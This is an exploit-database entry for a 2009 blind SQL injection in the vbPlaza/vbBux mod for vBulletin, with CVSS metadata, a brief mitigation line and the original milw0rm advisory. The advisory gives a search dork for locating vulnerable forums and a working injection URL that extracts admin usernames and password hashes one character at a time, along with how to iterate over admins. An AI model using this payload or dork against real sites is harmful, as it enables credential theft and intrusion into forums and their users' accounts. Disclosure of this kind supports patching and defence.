header-logo
Suggest Exploit
vendor:
vbBux/vbPlaza
by:
Cold z3ro & Crck_Man
7,5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: vbBux/vbPlaza
Affected Version From: 2.x
Affected Version To: 2.x
Patch Exists: YES
Related CWE: N/A
CPE: a:vbulletin:vbulletin_2.x
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

vBulletin vbBux/vbPlaza <= 2.x (vbplaza.php) Remote Blind SQL Injection Vulnerability

A Blind SQL Injection vulnerability exists in the name of vbplaza.php, a mod for vBulletin, which is able to retrieve admin hash. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The attacker can use the ascii() function to encode the substring of the SELECT statement to retrieve the admin hash.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

--==+======================================================================================================================+==--
--==+                  vBulletin vbBux/vbPlaza <= 2.x (vbplaza.php) Remote Blind SQL Injection Vulnerability                +==--
--==+======================================================================================================================+==--

AUTHOR: Cold z3ro & Crck_Man
SITE: www.vbPlaza.com
DORK: inurl:"vbplaza.php?do=*"

DESCRIPTION: Blind SQL Injection in name of vbplaza.php a mod for vBulletin, able to retrieve admin hash

EXPLOIT: 
http://www.site.com/forum/vbplaza.php?do=item&name=bank'/**/and 58<ascii(substring((SELECT concat(password,0x3a,username) from user limit 0,1),33,1))/*

IE: ascii encodes
	58  => :
	48  => 0
	120 => x

NOTE: You'll need to be logged into the forum to exploit vbplaza.php. Increment the limit to get the next admin .


Copyrights : www.hackteach.org , www.h-t.cc

Greetz : www.hackteach.[org/net] , www.islam-attack.com , www.s3curi7y.com , www.xp10.biz , Friends 

# milw0rm.com [2009-05-26]